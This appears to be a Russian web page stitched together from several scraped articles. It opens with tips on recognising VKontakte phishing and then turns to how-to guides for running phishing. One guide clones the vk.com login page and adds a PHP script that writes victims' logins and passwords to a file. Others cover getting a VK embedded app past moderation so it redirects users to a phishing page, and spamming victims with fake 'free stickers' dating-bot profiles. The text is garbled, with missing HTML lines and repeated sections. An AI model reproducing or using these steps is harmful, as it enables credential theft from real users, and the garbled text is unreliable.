Как не попасться на фишинговый сайт?
В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.
- Что такое фишинг?
- Будьте внимательными
- Создание фишинг сайта
- Рассказ о том как залить все это дело на хостинг
- Вывод
- Что понадобится
Что такое фишинг?
Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.
Будьте внимательными
Как вам могут подсунуть такой сайт, есть пару примеров.
- На любом ресурсе может быть ссылка, в которой говорится: “добавь меня в друзья и получи за это 10 голосов вконтакте”. Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
- Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)
И еще куча вариантов, как можно заманить жертву на такой вот сайт.
2022 Рыбалка ВК ФИШИНГ в 2 шага Приколы и рабочие файлы. Инженерия не спим)) Хакерство.Читинг
Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать.
Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.
Создание фишинг сайта
Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.
И так приведу пример создания фишингового сайта для социальной сети вконтакте.
Открываем любой браузер, заходим по адресу vk.com,
жмем файл => сохранить как =>
Как создать фишинговый сайт ВКонтакте | Создание фишинг сайта
Имя файла: index.html
Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php
Открываем блокнот и вставляем туда этот код.
$Login = $_POST[‘zabor’]; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(‘ups.php’,’a+’); //тут будут лежать пароли жертв
fwrite($log,’
$Login:$Pass n’); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo ‘’; // перенаправляем жертву на http://vk.com
?>
Закрываем и сохраняем как icq.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим Он найдет строчку:
Меняем её на это:
Дальше, смотрим чуть ниже и находим строчку:
Источник: 27sysday.ru
Как сделать фишинг ссылку для вк
IT Новости
Благодаря данной теме наши фейковые аккаунты ВКонтакте не будут блокировать, а у жертв будет намного больше доверия.
Интересный способ, но для него потребуется панель.
И так, сразу к делу.
Необходимости
1. Домен, который мы будем использовать в качестве CDN
2. Домен самого фишинга
Подготовка
Благодаря данной теме наши фейковые аккаунты ВКонтакте не будут блокировать, а у жертв будет намного больше доверия.
1. Переходим по ссылке и скачиваем верстку уже подготовленную к настройке вашего будущего приложения ВКонтакте.
2. Заходи по ссылке https://vk.com/editapp?act=create и указываем название описание категорию. Обязательно ставим встраиваемое приложение.
3. Далее нажимаем на кнопку «Перейти к настройке приложения». Переходим в настройки ?
4. В версиях где указан URL вставляем именно наш CDN (на него нужно загрузить нашу верстку). Сохраняем изменения, и переходим к настройке верстки. В отмеченных областях прописываем свои данные ?
5. Сохраняем изменения и пушим на хост. Далее заходим в помощь и отправляем наше приложение на модерацию.
Обязательно ставим галочку что используем библиотеку VK Bridge.
6. После чего ждем одобрения приложения, и начинаем уже спамить. Суть в том что когда жертва нажмет кнопку — произойдет редирект на наш фишинг.
Способ фишинга
Интересный способ, но для него потребуется панель. Где и как ее достать — думайте сами.
Необходимости
1. Много аккаунтов Telegram
2. Панель для фишинга
Суть
1) Идём в «ДайВинчик» и регистрируем аккаунт;
2) Заполняем его, ставим возраст 10-25 лет, пол — «я девушка» (к парням никто не заходит), интересует — «все равно», город — любой, имя — «Бесплатные стикеры ВК»;
3) Указываем текст в описании — «Любой стикер стоимостью до 10 голосов и забирай себе в коллекцию *Ссылка*»;
4) Ставим в фото набор стикерпаков;
В итоге получается так ?
Отлично, можно идти и спамить. Вот только ДайВинчику это может не понравиться и он наложит ограничения. Какие?
Слишком много лайков за сегодня — всплывает ограничение «Мне нравится только тем кто тебе действительно нравится. Загляни к нам попозже.» Крайне не приятная вещь, однако обойти ее как делать нечего. И так, если лайкнуть за день ~25 анкет, то до конца дня даётся такое:
Решение есть — когда вам предлагают получить стикеры, то подписываемся на их новостной канал и получаем стики:
Блок снят и можно идти дальше лайкать анкеты.
Источник: rest-zone.ru